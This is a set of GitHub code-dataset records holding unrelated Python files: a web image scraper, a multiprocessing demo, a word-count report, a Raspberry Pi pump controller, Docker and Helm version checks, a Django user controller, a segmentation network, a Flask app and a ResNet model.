+ '/' + folder\n if os.path.exists(path) == True:\n content = os.listdir(path)\n clean_folder(path, content)\n for image in url_images:\n extension = image[image.rfind('.'):len(image)]\n if \".jpeg\" in extension:\n extension = \".jpeg\"\n else:\n extension = extension[0:4]\n x += download_image(folder, url_images[x], \"image\" + str(x) + extension)\n if x == rec:\n break\n print(bcolors.OK + str(x) + bcolors.RESET + \" images downloaded successfully\")\n\nif __name__ == '__main__':\n main()","repo_name":"veaz/arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4860332946","text":"\"\"\"Exemplo de Pool nativo\"\"\"\n\nfrom multiprocessing import Pool\nfrom os import getpid\nfrom pprint import pprint\n\n\ndef soma_2(x):\n return x + 2, getpid()\n\n\nif __name__ == '__main__':\n\n workers = Pool(5)\n\n # Sync\n # result = workers.map(soma_2, range(100))\n # pprint(result)\n\n # Async\n result = workers.map_async(soma_2, range(100))\n result.wait()\n pprint(result.get())\n","repo_name":"joscelino/multiprocessamento_python","sub_path":"multi_processos/exemplos/app4.py","file_name":"app4.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3022298988","text":"# File: wordChart.py\r\n# Kevin Nakashima\r\n# Takes a text file\r\n# Program will count the number of times each word occurs in file\r\n# Program will print out a histogram of words and frequencies\r\n#==============================================================================\r\n# RESOURCES\r\n# http://programminghistorian.org/lessons/counting-frequencies\r\n# http://moderndata.plot.ly/generate-html-reports-with-python-pandas-and-plotly/\r\n# https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions\r\n# https://www.tutorialspoint.com/python/python_dictionary.htm\r\n# http://help.plot.ly/embed-graphs-in-websites/\r\n# IMPORTS\r\n\r\n\r\n# CLASS DECLARATIONS\r\nclass report():\r\n __slots__ = ['word','wordlist','fName','shortest','longtest','most','least']\r\n def __init__(self, 
fName):\r\n self.word = \"\"\r\n self.wordlist = {}\r\n self.fName = fName\r\n self.shortest = \"\"\r\n self.longest = \"\"\r\n self.most = \"\"\r\n self.least = \"\"\r\n \r\n def addWord(self):\r\n self.word = self.word.lower()\r\n if len(self.word) == 1:\r\n self.shortest = self.word\r\n if len(self.word) > len(self.longest):\r\n self.longest = self.word\r\n if self.word in self.wordlist:\r\n #if dictionary has word, increment frequency\r\n self.wordlist[self.word] = self.wordlist[self.word] + 1\r\n else:#if not in dictionary, create\r\n self.wordlist[self.word] = 1\r\n #reset word\r\n self.word = \"\"\r\n\r\n def mostLeast(self):\r\n self.most = max(self.wordlist, key=self.wordlist.get)\r\n self.least = min(self.wordlist, key=self.wordlist.get)\r\n\r\n \r\n def writeReport(self, f):\r\n self.mostLeast()\r\n outFile = open(f + \".html\", 'w')\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(self.fName + \"Analysis\")\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(\"Longest Word: {}\".format(self.longest))\r\n outFile.write(\"Shortest Word: {}\".format(self.shortest))\r\n outFile.write(\"Word used most: {}\".format(self.most))\r\n outFile.write(\"Word used least: {}\".format(self.least))\r\n for keys, values in self.wordlist.items():\r\n line = \"{} : {}\".format(keys, values)\r\n outFile.write(line)\r\n outFile.write(\"\\n\\\r\n \")\r\n #close output File\r\n outFile.close()\r\n\r\ndef main():\r\n #variable declarations\r\n r = report(input(\"Enter the file name: \"))\r\n #open file to read\r\n with open(r.fName) as f:\r\n while True:\r\n #read one character at a time\r\n c = f.read(1) \r\n #if not alphanumeric, ignore\r\n if c.isalpha():\r\n r.word += c\r\n elif c == ' ' or c == '\\n':\r\n r.addWord()\r\n elif not c:\r\n r.addWord()\r\n break\r\n\r\n f = r.fName.split('.')\r\n r.writeReport(f[0])\r\n \r\nmain()\r\n","repo_name":"Sirly/practice_python_programs","sub_path":"wordChart.py","file_name":"wordChart.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"75084273690","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef digital_for_duration(pin, duration):\n if pin == 21: # If the chosen pin is for the Washing pump\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.HIGH) # Open the Valve\n print(\"Valve (Pin 20) opened.\")\n \n elif pin == 23: # If the chosen pin is for the Sample water\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.LOW) # Close the Valve\n print(\"Valve (Pin 20) closed.\")\n \n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\n print(f\"Pin {pin} turned on for {duration} seconds.\")\n \n try:\n time.sleep(duration)\n except KeyboardInterrupt:\n print(f\"\\nInterrupted! Turning off pin {pin} immediately.\")\n \n GPIO.output(pin, GPIO.LOW)\n print(f\"Pin {pin} turned off.\")\n\ndef pwm_for_duration(pin, duty_cycle, duration):\n GPIO.setup(pin, GPIO.OUT)\n \n pwm = GPIO.PWM(pin, 100) # Frequency is hardcoded to 100Hz\n \n try:\n pwm.start(duty_cycle)\n print(f\"Started PWM on pin {pin} with 100Hz frequency and {duty_cycle}% duty cycle.\")\n print(f\"It will run for {duration} seconds or you can press Ctrl+C to exit early.\")\n time.sleep(duration)\n except KeyboardInterrupt:\n print(\"\\nExiting early due to user interrupt.\")\n finally:\n pwm.stop()\n print(f\"Stopped PWM on pin {pin}.\")\n\ndef main():\n try:\n while True:\n print(\"\\nMenu:\")\n print(\"1. Digital Output\")\n print(\"2. PWM Output\")\n print(\"3. Exit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == \"1\":\n print(\"\\nDigital Output Options:\")\n print(\"1. Sample water (Pin 23)\")\n print(\"2. Washing pump (Pin 21)\")\n print(\"3. Mixing pump (Pin 16)\")\n print(\"4. Valve (Pin 20)\")\n \n digital_choice = input(\"Enter your choice: \")\n if digital_choice == \"1\":\n pin = 23\n elif digital_choice == \"2\":\n pin = 21\n elif digital_choice == \"3\":\n pin = 16\n elif digital_choice == \"4\":\n pin = 20\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duration = float(input(\"Enter duration in seconds: \"))\n digital_for_duration(pin, duration)\n \n elif choice == \"2\":\n print(\"\\nPWM Output Options:\")\n print(\"1. LED (Pin 12, max 40%)\")\n print(\"2. Dosing pump (Pin 13, max 40%)\")\n \n pwm_choice = input(\"Enter your choice: \")\n if pwm_choice == \"1\":\n pin = 12\n elif pwm_choice == \"2\":\n pin = 13\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duty_cycle = float(input(\"Enter duty cycle (0-40): \"))\n if duty_cycle > 40:\n print(\"Duty cycle exceeds maximum limit. 
Setting to 40%.\")\n duty_cycle = 40\n\n duration = float(input(\"Enter duration in seconds: \"))\n pwm_for_duration(pin, duty_cycle, duration)\n \n elif choice == \"3\":\n print(\"Exiting program.\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\n except KeyboardInterrupt:\n print(\"\\nProgram interrupted by user. Exiting.\")\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"timothymoniaga/raspi-ph","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10068552328","text":"import os\nimport re\nimport sys\nfrom packaging import version\nfrom subprocess import Popen, PIPE\nfrom poco.services.file_utils import FileUtils\nfrom poco.services.state import StateHolder\nfrom .console_logger import ColorPrint\nfrom datetime import *\n\n\nclass EnvironmentUtils:\n\n @staticmethod\n def get_variable(key, default=None):\n return os.environ.get(key, default)\n\n @staticmethod\n def set_variable(key, value):\n os.environ[key] = value\n\n @staticmethod\n def set_poco_uid_and_gid():\n if os.name == \"posix\":\n EnvironmentUtils.set_variable(\"POCO_UID\", str(os.getuid()))\n EnvironmentUtils.set_variable(\"POCO_GID\", str(os.getgid()))\n\n @staticmethod\n def check_docker():\n p = Popen(\"docker version -f {{.Server.Version}}\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message='Docker not running.')\n if str(out).split(\".\")[0] < str(17):\n ColorPrint.exit_after_print_messages(message='Please upgrade Docker to version 17 or above')\n\n @staticmethod\n def check_kubernetes():\n EnvironmentUtils.check_base(command=\"kubectl version --short\", message_head=\"Kubernetes\")\n\n @staticmethod\n def check_helm():\n EnvironmentUtils.check_base(command=\"helm version -s --short\", message_head=\"Helm\")\n\n @staticmethod\n def check_base(command, message_head):\n p = Popen(command, stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message=str(err).strip())\n ColorPrint.print_with_lvl(message=message_head + \"\\n \" + str(out).strip(), lvl=1)\n\n @staticmethod\n def check_version(current_version, is_beta_tester, is_force_check):\n if (EnvironmentUtils.need_check() or is_force_check):\n # check pip\n p = Popen(\"pip install poco==\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0:\n newest_version = EnvironmentUtils.parse_version(str(err), is_beta_tester)\n else:\n # maybe installed from source\n return\n if version.parse(current_version) < version.parse(newest_version):\n ColorPrint.print_warning(\"New version of poco is available. 
\\n \"\n \"Please upgrade with: pip install poco==\" + newest_version)\n elif is_force_check:\n ColorPrint.print_warning(\"Poco is up to date\")\n\n @staticmethod\n def parse_version(pip_content, is_beta_tester):\n \"\"\"PIP response variations and expected versions:\n * '(from versions: 0.0.1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1.dev1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1,0.0.2.dev1)' - noDev: 0.0.1 isDev: 0.0.2.dev1\n\n not dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\n is dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\n \"\"\"\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\"\n if is_beta_tester:\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\"\n matches = re.findall(version_expression, pip_content)\n\n pre_ver = matches[0] if len(matches) > 0 else \"0.0.0\"\n return pre_ver[0] if type(pre_ver) is tuple else pre_ver\n\n @staticmethod\n def decode(text_string):\n if sys.version_info[0] == 3:\n return text_string.decode(\"utf-8\")\n return text_string\n\n @staticmethod\n def need_check():\n directory = StateHolder.home_dir\n filename = \"latest_update_check_date\"\n latest_check_date = FileUtils.get_file_content(directory, filename)\n today = str(date.today())\n if (latest_check_date < today):\n FileUtils.write_to_file(directory, filename, today)\n return True\n return False\n","repo_name":"shiwaforce/poco","sub_path":"poco/services/environment_utils.py","file_name":"environment_utils.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"} +{"seq_id":"16157232832","text":"from django.contrib.auth.models import User\nfrom ..serializers import UsuarioSerializer\nfrom ..models import Puesto, Usuario, Rol, EstatusUsuario, Idioma\n\nclass ControllerUsuario:\n def crearUsuario(request):\n datosUsuario = request.data\n print(request.data)\n print(request)\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username)\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n \n UsuarioNuevo = Usuario.objects.create(\n username =username,\n p_nombre = datosUsuario['p_nombre'],\n p_apellido = datosUsuario['p_apellido'],\n s_apellido= datosUsuario['s_apellido'],\n email= datosUsuario['email'],\n telefono = datosUsuario['telefono'], \n password = datosUsuario['password'],\n es_activo = datosUsuario['es_activo'],\n rol = rol,\n puesto = puesto,\n idioma = idioma,\n estatus = estatus,\n )\n\n userNuevo = User.objects.create(\n username = username,\n email = datosUsuario['email'],\n password = datosUsuario['password'],\n )\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return 
{\"estatus\":\"Ok\", 'nuevo_usuario': UsuarioNuevo.username}\n \n def listarUsuario(id_usuario=None):\n if id_usuario:\n try:\n queryset = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n queryset = Usuario.objects.all()\n serializer = UsuarioSerializer(queryset, many=True)\n return serializer.data\n\n def verPerfil(p_nombre=None):\n if p_nombre:\n try:\n queryset = Usuario.objects.get(p_nombre=p_nombre)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n return ({'result': 'Ingrese el nombre de usuario'})\n\n\n def modificarUsuario(request,id_usuario=None):\n if id_usuario:\n datosUsuario = request.data\n try:\n usuarioModificar = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username).exclude(id_usuario=id_usuario)\n\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n usuarioModificar.username = username\n usuarioModificar.p_nombre = datosUsuario['p_nombre']\n usuarioModificar.p_apellido = datosUsuario['p_apellido']\n usuarioModificar.s_apellido= datosUsuario['s_apellido']\n usuarioModificar.email= datosUsuario['email']\n usuarioModificar.telefono = datosUsuario['telefono'] \n usuarioModificar.password = datosUsuario['password']\n usuarioModificar.es_activo = datosUsuario['es_activo']\n usuarioModificar.rol = rol\n usuarioModificar.puesto = puesto\n usuarioModificar.idioma = idioma\n usuarioModificar.estatus = estatus\n \n usuarioModificar.save()\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return {\"estatus\":\"Ok\", 'Usuario_modificado': usuarioModificar.username}\n else: \n return {\"result\":\"Ingrese el Id del usuario que desea modificar\"}","repo_name":"raquelnany/ACTIVO_DJANGO_DOCKER_PROGRES","sub_path":"app/core/controller/ControllerUsuario.py","file_name":"ControllerUsuario.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21785016887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 29/06/18\n\n@author: HarryS\n\"\"\"\n\nfrom scanning_functions import *\n\n\ndef run_scan(param_dict, args):\n \"\"\"\n Given points defined in param_dict run create run point directories\n and populate with Herwig .in file and params.dat file.\n\n Parameters\n ----------\n\n param_dict: dict\n Dictionary with parameter names as keys each containing another\n dictionary with keys 'range' and 'values'.\n\n args: argparse.Namespace object\n 
Argparse object with attributes containing command line options.\n\n Returns\n -------\n\n None\n\n \"\"\"\n\n # Read in run card template files\n template = read_template_file(args.template_file)\n\n make_directory(args.out_dir)\n for run_point in range(args.num_points):\n # Run point directories are inside the output directory and hold\n # the necessary files to run Herwig with the param_dict associated\n # with that point\n run_point_path = make_run_point_directory(run_point, args.out_dir)\n\n # Write params.dat file inside run point directory. This is purely to\n # record what the param_dict are at this run point\n write_param_file(param_dict, run_point_path, run_point)\n\n # Write run card template files formatted with parameter values\n write_template_files(template, param_dict, run_point,\n run_point_path, args.param_file)\n\n # Write all sampled points and their run points to a .dat file\n write_sampled_points(args.out_dir)\n","repo_name":"hsaunders1904/contur","sub_path":"AnalysisTools/contur/contur/Scanning/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8444128579","text":"\"\"\"\"\nCode is modified based on : https://github.com/lxtGH/PFSegNets\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Nets.SGFANet.mynn import Norm2d\nfrom Nets.ground_transformer import GroundTrans\n\n\ndef point_sample(input, point_coords, **kwargs):\n \"\"\"\n A wrapper around :function:`torch.nn.functional.grid_sample` to support 3D point_coords tensors.\n Unlike :function:`torch.nn.functional.grid_sample` it assumes `point_coords` to lie inside\n [0, 1] x [0, 1] square.\n\n Args:\n input (Tensor): A tensor of shape (N, C, H, W) that contains features map on a H x W grid.\n point_coords (Tensor): A tensor of shape (N, P, 2) or (N, Hgrid, Wgrid, 2) that contains\n [0, 1] x [0, 1] normalized point coordinates.\n\n Returns:\n output (Tensor): A tensor of shape (N, C, P) or (N, C, Hgrid, Wgrid) that contains\n features for points in `point_coords`. 
The features are obtained via bilinear\n interplation from `input` the same way as :function:`torch.nn.functional.grid_sample`.\n \"\"\"\n add_dim = False\n if point_coords.dim() == 3:\n add_dim = True\n point_coords = point_coords.unsqueeze(2)\n output = F.grid_sample(input, 2.0 * point_coords - 1.0, **kwargs)\n if add_dim:\n output = output.squeeze(3)\n return output\n\n\ndef get_uncertain_point_coords_on_grid(uncertainty_map, num_points):\n \"\"\"\n Find `num_points` most uncertain points from `uncertainty_map` grid.\n\n Args:\n uncertainty_map (Tensor): A tensor of shape (N, 1, H, W) that contains uncertainty\n values for a set of points on a regular H x W grid.\n num_points (int): The number of points P to select.\n\n Returns:\n point_indices (Tensor): A tensor of shape (N, P) that contains indices from\n [0, H x W) of the most uncertain points.\n point_coords (Tensor): A tensor of shape (N, P, 2) that contains [0, 1] x [0, 1] normalized\n coordinates of the most uncertain points from the H x W grid.\n \"\"\"\n R, _, H, W = uncertainty_map.shape\n h_step = 1.0 / float(H)\n w_step = 1.0 / float(W)\n\n num_points = min(H * W, num_points)\n point_indices = torch.topk(uncertainty_map.view(R, H * W), k=num_points, dim=1)[1]\n point_coords = torch.zeros(R, num_points, 2, dtype=torch.float, device=uncertainty_map.device)\n point_coords[:, :, 0] = w_step / 2.0 + (point_indices % W).to(torch.float) * w_step\n point_coords[:, :, 1] = h_step / 2.0 + (point_indices // W).to(torch.float) * h_step\n return point_indices, point_coords\n\n\nclass PointFlowModuleWithCornerEdgeSampling(nn.Module):\n def __init__(self, in_planes, dim=64, matcher_kernel_size=3,\n edge_points=32, corner_points=32, gated=False, gt_tag=True):\n super(PointFlowModuleWithCornerEdgeSampling, self).__init__()\n self.dim = dim\n self.down_h = nn.Conv2d(in_planes, dim, 1)\n self.down_l = nn.Conv2d(in_planes, dim, 1)\n self.softmax = nn.Softmax(dim=-1)\n self.edge_points = edge_points\n self.corner_points = corner_points\n self.gated = gated\n self.gt_tag = gt_tag\n if self.gt_tag:\n self.gt = GroundTrans(in_channels=in_planes, dimension=2)\n print(\"Ground Transformer\")\n print(f\"edge points:{self.edge_points},corner points:{self.corner_points}\")\n if self.gated:\n print(\"weight gate is added\")\n self.channel_gate = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, in_planes), nn.Sigmoid())\n self.feature_inportance = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), nn.ReLU(),\n nn.Linear(in_planes, 1), nn.Sigmoid())\n self.edge_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=3, padding=1, bias=False)\n )\n self.corner_final = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=in_planes, kernel_size=3, padding=1, bias=False),\n Norm2d(in_planes),\n nn.ReLU(),\n nn.Conv2d(in_channels=in_planes, out_channels=1, kernel_size=1, bias=False)\n )\n\n def forward(self, x):\n\n x_high, x_low = x # 8,8 16,16\n\n stride_ratio = x_low.shape[2] / x_high.shape[2]\n N, C, H, W = x_low.shape\n N_h, C_h, H_h, W_h = x_high.shape\n\n # edge part\n x_high_edge = x_high\n edge_pred = self.edge_final(x_high_edge)\n point_indices, point_coords = get_uncertain_point_coords_on_grid(edge_pred,\n num_points=self.edge_points) # torch.Size([2, K, 2])\n sample_x = point_indices % W_h * stride_ratio\n sample_y = 
point_indices // W_h * stride_ratio\n low_edge_indices = sample_x + sample_y * W\n low_edge_indices = low_edge_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_edge_feat = point_sample(x_high, point_coords) # torch.Size([2, 256, K])\n low_edge_feat = point_sample(x_low, point_coords)\n if self.gated:\n high_edge_feat = self.channel_gate(high_edge_feat.permute(0, 2, 1)) * high_edge_feat.permute(0, 2, 1)\n high_edge_feat = high_edge_feat.permute(0, 2, 1)\n low_edge_feat = self.channel_gate(low_edge_feat.permute(0, 2, 1)) * low_edge_feat.permute(0, 2, 1)\n low_edge_feat = low_edge_feat.permute(0, 2, 1)\n affinity_edge = torch.bmm(high_edge_feat.transpose(2, 1), low_edge_feat).transpose(2, 1)\n affinity = self.softmax(affinity_edge)\n high_edge_feat = torch.bmm(affinity, high_edge_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i = self.feature_inportance(high_edge_feat.permute(0, 2, 1))\n f_i = f_i.permute(0, 2, 1)\n fusion_edge_feat = f_i * high_edge_feat + (1 - f_i) * low_edge_feat\n else:\n fusion_edge_feat = high_edge_feat + low_edge_feat\n\n # corner part\n x_high_corner = x_high\n corner_pred = self.corner_final(x_high_corner)\n corner_point_indices, corner_point_coords = get_uncertain_point_coords_on_grid(corner_pred,\n num_points=self.corner_points)\n corner_sample_x = corner_point_indices % W_h * stride_ratio\n corner_sample_y = corner_point_indices // W_h * stride_ratio\n low_corner_indices = corner_sample_x + corner_sample_y * W\n low_corner_indices = low_corner_indices.unsqueeze(1).expand(-1, C, -1).long()\n high_corner_feat = point_sample(x_high, corner_point_coords)\n low_corner_feat = point_sample(x_low, corner_point_coords)\n if self.gated:\n high_corner_feat = self.channel_gate(high_corner_feat.permute(0, 2, 1)) * high_corner_feat.permute(0, 2, 1)\n high_corner_feat = high_corner_feat.permute(0, 2, 1)\n low_corner_feat = self.channel_gate(low_corner_feat.permute(0, 2, 1)) * low_corner_feat.permute(0, 2, 1)\n low_corner_feat = low_corner_feat.permute(0, 2, 1)\n affinity_corner = torch.bmm(high_corner_feat.transpose(2, 1), low_corner_feat).transpose(2, 1)\n affinity_corner = self.softmax(affinity_corner)\n high_corner_feat = torch.bmm(affinity_corner, high_corner_feat.transpose(2, 1)).transpose(2, 1)\n if self.gated:\n f_i_c = self.feature_inportance(high_corner_feat.permute(0, 2, 1))\n f_i_c = f_i_c.permute(0, 2, 1)\n fusion_corner_feat = f_i_c * high_corner_feat + (1 - f_i_c) * low_corner_feat\n else:\n fusion_corner_feat = high_corner_feat + low_corner_feat\n\n # GT Part\n if self.gt_tag == True:\n x_low = self.gt(x_low, x_high)\n\n final_features = x_low.reshape(N, C, H * W).scatter(2, low_edge_indices, fusion_edge_feat) # edge\n final_features = final_features.scatter(2, low_corner_indices, fusion_corner_feat) # corner\n final_features = final_features.view(N, C, H, W) #\n return final_features, edge_pred, corner_pred\n # end\n","repo_name":"zpl99/SGFANet","sub_path":"Nets/SGFANet/point_flow.py","file_name":"point_flow.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70914035610","text":"#!/usr/bin/python3\n\"\"\"Flask web application\nMust be listening on 0.0.0.0, port 5000\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n \"\"\"Displays list of all State on HTML page\n \"\"\"\n states = storage.all(\"State\")\n 
return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef states_id(id):\n \"\"\"Displays a State with a given id on HTML page\"\"\"\n for state in storage.all(\"State\").values():\n if state.id == id:\n return render_template(\"9-states.html\", state=state)\n return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n \"\"\"Remove current SQLAlchemy session\"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","repo_name":"mesihg/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15698421047","text":"from models.select_channels import ChannelSelection\nimport torch.nn as nn\nimport torch\nimport math\n\n\n# [conv1in, conv1out=conv2in, conv2out=conv3in] (conv3out=planes*expansion)\n# cfg the channels after bn\ndefaultcfg = [[16, 16, 16], [64, 16, 16]*(18-1), [64, 32, 32], [128, 32, 32]*(18-1), [128, 64, 64],\n [256, 64, 64]*(18-1), [256]]\n\n__all__ = ['resnet164']\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, cfg, stride):\n super(Bottleneck, self).__init__()\n self.expansion = Bottleneck.expansion\n\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.select = ChannelSelection(inplanes)\n self.conv1 = nn.Conv2d(cfg[0], cfg[1], kernel_size=1, stride=1, bias=False)\n\n self.bn2 = nn.BatchNorm2d(cfg[1])\n self.conv2 = nn.Conv2d(cfg[1], cfg[2], kernel_size=3, stride=stride, padding=1, bias=False)\n\n self.bn3 = nn.BatchNorm2d(cfg[2])\n self.conv3 = nn.Conv2d(cfg[2], planes * self.expansion, kernel_size=1, stride=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = nn.Identity()\n if stride != 1 or inplanes != planes * self.expansion:\n self.downsample = nn.Conv2d(inplanes, planes * self.expansion, kernel_size=1, stride=stride, bias=False)\n\n def forward(self, x):\n residual = self.downsample(x)\n\n out = self.bn1(x)\n out = self.select(out)\n out = self.relu(out)\n out = self.conv1(out)\n\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_class, cfg=None):\n super(ResNet, self).__init__()\n self.inplanes = 16\n if cfg is None:\n cfg = [item for sublist in defaultcfg for item in sublist]\n\n self.conv1 = nn.Conv2d(3, 16, 3, 1, 1, bias=False)\n self.stage1 = self.make_layers(Bottleneck, 16, 18, cfg[0: 18 * 3], 1)\n self.stage2 = self.make_layers(Bottleneck, 32, 18, cfg[18 * 3: 2 * 18 * 3], 2)\n self.stage3 = self.make_layers(Bottleneck, 64, 18, cfg[2 * 18 * 3: 3 * 18 * 3], 2)\n self.bn = nn.BatchNorm2d(64 * Bottleneck.expansion)\n self.select = ChannelSelection(64 * Bottleneck.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(cfg[-1], num_class)\n self._init_weights()\n\n def make_layers(self, Block, planes, blocks, cfg, stride):\n layers = []\n layers += [Block(self.inplanes, planes, cfg[0: 3], stride)]\n self.inplanes = planes * Block.expansion\n for i in range(1, blocks):\n layers += [Block(self.inplanes, planes, cfg[i * 3: i * 3 + 3], 1)]\n\n return nn.Sequential(*layers)\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * 
